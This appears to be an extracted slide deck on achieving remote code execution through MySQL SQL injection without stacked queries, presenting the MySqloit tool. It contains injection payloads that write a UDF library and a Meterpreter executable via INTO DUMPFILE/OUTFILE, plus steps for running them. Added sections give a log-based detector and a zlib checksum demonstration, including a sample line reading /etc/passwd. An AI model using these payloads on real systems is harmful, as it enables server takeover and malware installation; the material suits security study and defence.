SQL Injection



An attack technique used to exploit web sites that construct SQL statements from user input



Normally it is used to read, modify and delete database data
In some cases, it can be used to achieve remote code execution
What is a stacked query?



A condition where multiple SQL statements are allowed in one query; the statements are separated by semicolons

Stacked queries are commonly used to write a file onto the machine while conducting a SQL injection attack

At Black Hat Amsterdam 2009, Bernardo Damele demonstrated remote code execution performed through SQL injection on platforms with stacked queries

Today I will demonstrate how to conduct remote code execution through SQL injection without stacked queries

MySQL-PHP is widely used, but stacked queries are not allowed by default for security reasons
Abusing stacked queries on MySQL








query.aspx?id=21; create table temp(a blob); insert into temp values (0x789c 414141')--

query.aspx?id=21; update temp set a = replace(a, '414141', 9775 710-

query.aspx?id=21; select a from temp into dumpfile '/var/lib/mysql/lib/udf.so'--

query.aspx?id=21; create function sys_exec RETURNS int SONAME 'udf.so'--



Stacked query table [column headers lost in extraction]

MSSQL        Supported   Supported   Supported
PostgreSQL   Supported   Supported   Supported
Remote command execution on MySQL-PHP



Traditionally, a simple PHP shell is used to execute commands



It is weak and offers little functionality



We need a reliable shell! 



Metasploit contains a variety of shellcodes
Meterpreter shellcode for the post-exploitation process





VNC shellcode for GUI access on the host 
File read/write access on MySQL-PHP platform

■ SELECT ... LOAD_FILE() is used to read a file

■ SELECT ... INTO OUTFILE/DUMPFILE is used to write a file

Remote code execution technique on MySQL-PHP platform

■ Upload the compressed arbitrary file onto the web server directory

■ Upload the PHP scripts onto the web server directory

■ Execute the PHP gzuncompress function to decompress the arbitrary file

■ Execute the arbitrary file through the PHP system function
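Detection logic for the technique above, as an added example that is not part of the slides or of MySqloit: it scans constructed Apache access-log lines for a UNION SELECT combined with a hex literal that starts with a zlib header (0x78 followed by 0x01, 0x5e, 0x9c or 0xda), INTO OUTFILE/DUMPFILE, or LOAD_FILE. Log lines, IPs and timestamps are constructed.

```python
import re
from urllib.parse import unquote_plus

# Markers of the technique: UNION SELECT, a hex literal whose first bytes are a
# zlib header (0x78 followed by 0x01, 0x5e, 0x9c or 0xda), and MySQL file I/O.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "zlib_hex":     re.compile(r"\b0x78(?:01|5e|9c|da)[0-9a-f]*"),
    "into_file":    re.compile(r"\binto\s+(?:out|dump)file\b"),
    "load_file":    re.compile(r"\bload_file\s*\("),
}
# Apache combined log format: ip ident user [time] "method url proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) ')

def normalize(url):
    """URL-decode twice (catches double encoding), lowercase, collapse whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(url)).lower())

def scan_line(line):
    """Return (client_ip, sorted indicator names) when the request carries a
    UNION SELECT plus at least one file/zlib marker, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = normalize(m["url"])
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(url))
    if "union_select" in hits and len(hits) > 1:
        return (m["ip"], hits)
    return None

def scan(lines):
    return [hit for hit in map(scan_line, lines) if hit]

# Constructed sample log lines (IPs, paths and timestamps are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Aug/2009:10:00:01 +0000] "GET /query.php?id=21 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Aug/2009:10:00:07 +0000] "GET /query.php?id=44444+UNION+SELECT'
    '+0x789c0311aabbcc,0x00,0x00+into+outfile+%27/var/www/upload/x.exe%27 HTTP/1.1" 200 0',
    '10.0.0.9 - - [10/Aug/2009:10:00:09 +0000] "GET /query.php?id=1+union+select'
    '+load_file(%27/etc/passwd%27),null,null-- HTTP/1.1" 200 2048',
    '10.0.0.7 - - [10/Aug/2009:10:00:11 +0000] "GET /search.php?q=union+select+minutes HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG):
        print(ip, hits)
```

The last sample line shows why a lone UNION SELECT is not reported: ordinary search text can contain those words, so the rule needs a file or zlib marker as well.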
Challenge on writing an arbitrary file through UNION SELECT

■ A GET request is limited to 8190 bytes on Apache; it may be smaller when a Web Application Firewall is in use

■ Data from the first query can overwrite the file header

■ Data from the extra columns adds unnecessary bytes to our arbitrary data, which can corrupt our file
Fixing the URL length issue

The PHP Zlib module can be used to compress the arbitrary file

9625 bytes of executable can be compressed to 630 bytes, which stays under the maximum request size

Decompress the file on the destination before the arbitrary file is executed
Removal of unnecessary data

UNION SELECT will combine the result from the first query with the result from the second query

query.php?id=                         <- First Query
UNION SELECT 34....3234,null,null--   <- Second Query

The result from the first query can overwrite the file header
Non-existent data can be injected in the WHERE clause so that the first query returns no rows
Result from first query data + executable code

[Screenshot: browser request to http://192.168.0.101/defcon/output.php?question=169 with a union select injecting a hex-encoded zlib stream (0x789c...), and a hex dump of the written file annotated "First Query" and "Executable code": the bytes of the first query's result ("defcon") precede the zlib header 78 9C of the executable code.]
Fixing the columns issue

In a UNION SELECT, the second query requires the same number of columns as the first query

The compressed arbitrary data should be injected in the first column to prevent data corruption

Zlib uses an Adler32 checksum and this value is added at the end of our compressed arbitrary data

Any injected data after the Adler32 checksum is ignored during the decompression process

query.php?id=44444 UNION SELECT 3....43143,0x00,0x00 into outfile '/var/www/upload/meterpreter.exe'
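The two ordering constraints the slides state (first-query data in front of the stream corrupts it; data after the Adler32 checksum is ignored) can be checked with Python's zlib, which reads the same stream format as PHP's gzcompress/gzuncompress. This is an added example on a constructed payload, not code from the slides or from MySqloit; split_stream also lets an analyst separate an embedded zlib stream from the trailing column bytes when examining a file recovered from an upload directory.

```python
import zlib

# Constructed stand-in for the arbitrary file (the slides use a 9625-byte executable);
# repetitive bytes so the example runs offline and compresses well.
PAYLOAD = bytes(range(256)) * 40

def compress_payload():
    """zlib stream as gzcompress() produces it: 2-byte header, deflate data,
    then the big-endian Adler32 of the uncompressed data."""
    return zlib.compress(PAYLOAD, 9)

def trailer_matches(stream, data):
    """True when the last four bytes of stream are the Adler32 of data."""
    return stream[-4:] == zlib.adler32(data).to_bytes(4, "big")

def split_stream(blob):
    """Decompress a zlib stream that must begin at offset 0 of blob.
    Returns (data, trailing): the decompressor stops at the Adler32 trailer,
    so bytes appended after it (the extra UNION columns) come back untouched
    in `trailing`. Raises zlib.error if anything precedes the header or the
    stream is incomplete."""
    d = zlib.decompressobj()
    data = d.decompress(blob)
    if not d.eof:
        raise zlib.error("stream incomplete")
    return data, d.unused_data

def simulate_written_file(first_query_data, extra_columns):
    """Model of the file a UNION SELECT ... INTO OUTFILE produces: bytes from
    the first query, then the compressed payload, then whatever the extra
    columns add (prefix and suffix are constructed inputs; OUTFILE escaping
    is not modelled). Returns ("ok", trailing) when the payload survives,
    ("corrupt", None) otherwise."""
    written = first_query_data + compress_payload() + extra_columns
    try:
        data, trailing = split_stream(written)
    except zlib.error:
        return ("corrupt", None)
    return ("ok" if data == PAYLOAD else "corrupt", trailing)

if __name__ == "__main__":
    stream = compress_payload()
    print(f"{len(PAYLOAD)} -> {len(stream)} bytes, Adler32 trailer ok: {trailer_matches(stream, PAYLOAD)}")
    print(simulate_written_file(b"", b"\t\\0\t\\0\n"))  # suffix after the checksum is ignored
    print(simulate_written_file(b"defcon\t", b""))       # prefix in front of the header breaks it
```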
Random data after the Adler32 checksum

[Screenshot: hex dump of the written file with the four Adler32 checksum bytes marked; the bytes that follow them are the random data from the extra columns.]
Remote code execution on LAMP (Linux, Apache, MySQL, PHP)

■ By default, a directory created in Linux is not writable by the mysql or web server users

■ When the mysql user can write a file into the web server directory, that directory can be used to upload our arbitrary file

■ By default, a file written to the web server directory through INTO DUMPFILE is readable but not executable, and is owned by the mysql user

■ Read the file content as the web server user and write it back into the web server directory

■ Chmod the file to be executable and execute it using the PHP system function
Remote code execution on WAMP (Windows, Apache, MySQL, PHP)

■ By default, MySQL runs as the Local System user

■ By default, this user can write into any directory, including the web server directory

■ Any new file created by this user is executable

■ The PHP system function can be used to execute this file
MySqloit

MySqloit is a MySQL injection takeover tool

Features

■ SQL Injection detection - Detect SQL injection through a deep blind injection method

■ Fingerprint Dir - Fingerprint the web server directory

■ Fingerprint OS - Fingerprint the operating system

■ Payload - Create a shellcode using Metasploit

■ Exploit - Upload the shellcode and execute it
Demo

MySqloit

Questions?

Thank You
muhaimindz@gmail.com 